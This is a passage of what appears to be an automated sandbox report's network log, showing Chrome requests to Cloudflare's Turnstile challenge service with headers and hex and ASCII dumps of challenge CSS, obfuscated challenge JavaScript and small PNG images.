                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c
                                                                                        Data Ascii: }.theme-dark h1{color:#fff}.theme-dark #challenge-error-title{color:#ffa299}.theme-dark #challenge-error-title a,.theme-dark #challenge-error-title a:link,.theme-dark #challenge-error-title a:visited{color:#bbb}.theme-dark #challenge-error-title a:active,
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 3b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b
                                                                                        Data Ascii: esh-link:active,.theme-dark #timeout-refresh-link:focus,.theme-dark #timeout-refresh-link:hover{color:#949494}.theme-dark .overlay{border-color:#ffa299;color:#ffa299}.theme-dark .error-message,.theme-dark .error-message a,.theme-dark .error-message a:link
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 7d 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 34 70 78 20 34 70 78 20 30 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 6c 65 66 74 3a 35 70 78 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 77 69 64
                                                                                        Data Ascii: :checked~.cb-i{background-color:#fff;border-radius:5px;opacity:1;transform:rotate(0deg) scale(1)}.cb-lb input:checked~.cb-i:after{border:solid #c44d0e;border-radius:0;border-width:0 4px 4px 0;height:12px;left:5px;top:0;transform:rotate(45deg) scale(1);wid
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 7b 6d 61 72 67 69 6e 3a 30
                                                                                        Data Ascii: ontent:center space-evenly;visibility:visible}.size-compact #expired-text,.size-compact #overrun-text,.size-compact #timeout-text{display:block}.size-compact #expired-refresh-link,.size-compact #timeout-refresh-link,.size-compact .error-message a{margin:0
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 23 74 65 72 6d 73 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 70 78 7d 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 20 2e 32 72 65 6d 7d 23 74 65 72 6d 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 23 74 65 72 6d 73 20 61 2c 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 7b 63 6f
                                                                                        Data Ascii: {margin-left:0;margin-right:16px}#terms{color:#232323;display:inline-flex;font-size:8px;font-style:normal;justify-content:flex-end;line-height:10px}#terms .link-spacer{margin:0 .2rem}#terms a{display:inline-block}#terms a,#terms a:link,#terms a:visited{co


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.1649728104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:39 UTC772OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=923707b7eceb8ce8&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:39 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:39 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 119511
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707bb3ae74270-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:39 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 43 75 55 53 37 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72
                                                                                        Data Ascii: window._cf_chl_opt.CuUS7={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflar
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32
                                                                                        Data Ascii: 0is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 61 75 78 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 67 75 69 64 65 6c 69 6e 65 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 65 4d 2c 65 4e 2c 65 4f 2c 65 52 2c 65 53 2c 66 6c 2c 66 6d 2c 66 6e 2c 66 72 2c 66 73 2c 66 76 2c 66 79 2c 66 41 2c 66 42 2c 66 43 2c 66
                                                                                        Data Ascii: ere%3F","turnstile_timeout":"Timed%20out"},"polyfills":{"feedback_report_aux_subtitle":false,"feedback_report_output_subtitle":false,"feedback_report_guideline":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eR,eS,fl,fm,fn,fr,fs,fv,fy,fA,fB,fC,f
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 35 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 68 72 2c 67 2c 68 29 7b 68 3d 28 68 72 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 68 72 28 31 34 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 26 6a 7d 2c 67 5b 68 72 28 31 37 36 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 2d 6a 7d 2c 67 29 3b 74 72 79 7b 69 66 28 68 72 28 37 36 30 29 3d 3d 3d 68 72 28 37 36 30 29 29 72 65 74 75 72 6e 20 66 6b 28 65 29 3b 65 6c 73 65 20 74 68 69 73 2e 68 5b 74 68 69 73 2e 68 5b 31 37 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 68 5b 68 72 28 31 34 33 37 29 5d 28 68 5b 68 72 28 31 37 36 31 29 5d 28 74 68 69 73 2e 68 5b 31 37 2e 30 38 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 72 28 35 35 30 29 5d 28 74 68 69 73 2e 68 5b 74 68 69
                                                                                        Data Ascii: 57)]=function(e,hr,g,h){h=(hr=gJ,g={},g[hr(1437)]=function(i,j){return i&j},g[hr(1761)]=function(i,j){return i-j},g);try{if(hr(760)===hr(760))return fk(e);else this.h[this.h[17^this.g][3]^h[hr(1437)](h[hr(1761)](this.h[17.08^this.g][1][hr(550)](this.h[thi
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 72 6e 20 69 3d 3d 68 7d 2c 27 6e 55 6e 6f 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 44 67 58 48 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 61 54 4c 55 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 67 4f 78 55 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 66 55 64 6d 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6e 49 4c 47 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 62 63 76 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4e 41 69 72 64
                                                                                        Data Ascii: rn i==h},'nUnoB':function(h,i){return i==h},'DgXHD':function(h,i){return i*h},'aTLUE':function(h,i){return h>i},'gOxUR':function(h,i){return i&h},'fUdmN':function(h,i){return i==h},'nILGT':function(h,i){return h<i},'Abcvl':function(h,i){return i*h},'NAird
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 31 29 2c 31 2e 33 34 26 4e 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 68 77 28 39 33 33 29 5d 28 64 5b 68 77 28 31 37 35 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 68 77 28 31 38 34 36 29 5d 28 49 3c 3c 31 2c 4e 29 2c 64 5b 68 77 28 31 36 34 34 29 5d 28 4a 2c 64 5b 68 77 28 31 33 36 35 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 77 28 39 33 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 77 28 35 35 30 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 68 77 28 31 37 32 33 29 5d 28 31 36 2c 78 29 3b 49 3d 49 3c 3c 31 7c 31 26 4e 2c 64 5b 68 77 28 31 33 38 35 29 5d 28 4a 2c
                                                                                        Data Ascii: 1),1.34&N),j-1==J?(J=0,H[hw(933)](d[hw(1759)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[hw(1846)](I<<1,N),d[hw(1644)](J,d[hw(1365)](j,1))?(J=0,H[hw(933)](o(I)),I=0):J++,N=0,x++);for(N=D[hw(550)](0),x=0;d[hw(1723)](16,x);I=I<<1|1&N,d[hw(1385)](J,
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 64 5b 68 77 28 38 31 38 29 5d 28 30 2c 45 29 26 26 47 2b 2b 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 2e 34 32 7c 64 5b 68 77 28 31 31 31 30 29 5d 28 4e 2c 31 29 2c 64 5b 68 77 28 39 32 35 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 68 77 28 39 33 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 68 77 28 39 34 33 29 5d 28 4a 2c 6a 2d 31 29 29 7b 48 5b 68 77 28 39 33 33 29 5d 28 6f 28 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 68 77 28 38 35 38 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 68 7a 29 7b 72 65
                                                                                        Data Ascii: :J++,N>>=1,x++);E--,d[hw(818)](0,E)&&G++}for(N=2,x=0;x<G;I=I<<1.42|d[hw(1110)](N,1),d[hw(925)](J,j-1)?(J=0,H[hw(933)](o(I)),I=0):J++,N>>=1,x++);for(;;)if(I<<=1,d[hw(943)](J,j-1)){H[hw(933)](o(I));break}else J++;return H[hw(858)]('')},'j':function(h,hz){re
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 42 28 31 39 30 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 42 28 31 30 39 37 29 5d 28 64 5b 68 42 28 31 38 31 39 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 68 42 28 31 33 35 35 29 5d 28 65 2c 4a 29 2c 4f 3d 64 5b 68 42 28 31 30 34 31 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 68 42 28 38 35 38 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d
                                                                                        Data Ascii: :0)*F,F<<=1);s[B++]=e(J),O=B-1,x--;break;case 1:for(J=0,K=Math[hB(1908)](2,16),F=1;K!=F;N=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J|=d[hB(1097)](d[hB(1819)](0,N)?1:0,F),F<<=1);s[B++]=d[hB(1355)](e,J),O=d[hB(1041)](B,1),x--;break;case 2:return D[hB(858)]('')}if(0==
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 29 5d 26 26 28 78 3d 78 5b 68 46 28 38 39 38 29 5d 28 67 5b 68 46 28 31 36 31 33 29 5d 5b 68 46 28 36 37 35 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 46 28 31 39 31 31 29 5d 5b 68 46 28 38 36 33 29 5d 26 26 67 5b 68 46 28 31 38 36 35 29 5d 3f 67 5b 68 46 28 31 39 31 31 29 5d 5b 68 46 28 38 36 33 29 5d 28 6e 65 77 20 67 5b 28 68 46 28 31 38 36 35 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 48 2c 48 29 7b 66 6f 72 28 68 48 3d 68 46 2c 47 5b 68 48 28 37 39 30 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 68 48 28 38 32 37 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 48 28 39 30 30 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 48 28 31 36 36 38 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27
                                                                                        Data Ascii: )]&&(x=x[hF(898)](g[hF(1613)][hF(675)](h))),x=g[hF(1911)][hF(863)]&&g[hF(1865)]?g[hF(1911)][hF(863)](new g[(hF(1865))](x)):function(G,hH,H){for(hH=hF,G[hH(790)](),H=0;H<G[hH(827)];G[H]===G[o[hH(900)](H,1)]?G[hH(1668)](H+1,1):H+=1);return G}(x),B='nAsAaAb'
                                                                                        2025-03-20 17:46:39 UTC1369INData Raw: 72 3d 67 4a 28 38 39 37 29 5b 67 4a 28 31 36 33 32 29 5d 28 27 3b 27 29 2c 66 73 3d 66 72 5b 67 4a 28 31 32 36 39 29 5d 5b 67 4a 28 31 31 39 32 29 5d 28 66 72 29 2c 65 4d 5b 67 4a 28 35 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 68 49 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 68 49 3d 67 4a 2c 69 3d 7b 27 67 6b 63 62 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 45 72 6c 49 45 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 48 4c 4b 43 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 68 49 28 31 39 30 39 29 5d 28 68 29 2c 6b 3d 30 3b 6b 3c 6a 5b 68 49 28 38 32 37 29 5d 3b 6b 2b 2b
                                                                                        Data Ascii: r=gJ(897)[gJ(1632)](';'),fs=fr[gJ(1269)][gJ(1192)](fr),eM[gJ(574)]=function(g,h,hI,i,j,k,l,m){for(hI=gJ,i={'gkcbB':function(n,o){return n+o},'ErlIE':function(n,o){return o===n},'HLKCO':function(n,o){return n(o)}},j=Object[hI(1909)](h),k=0;k<j[hI(827)];k++


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.1649727104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:39 UTC784OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:39 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:39 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707bb3d7b43ef-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.1649731104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:40 UTC425OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:40 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:40 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707c5888f0fa5-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.1649732104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
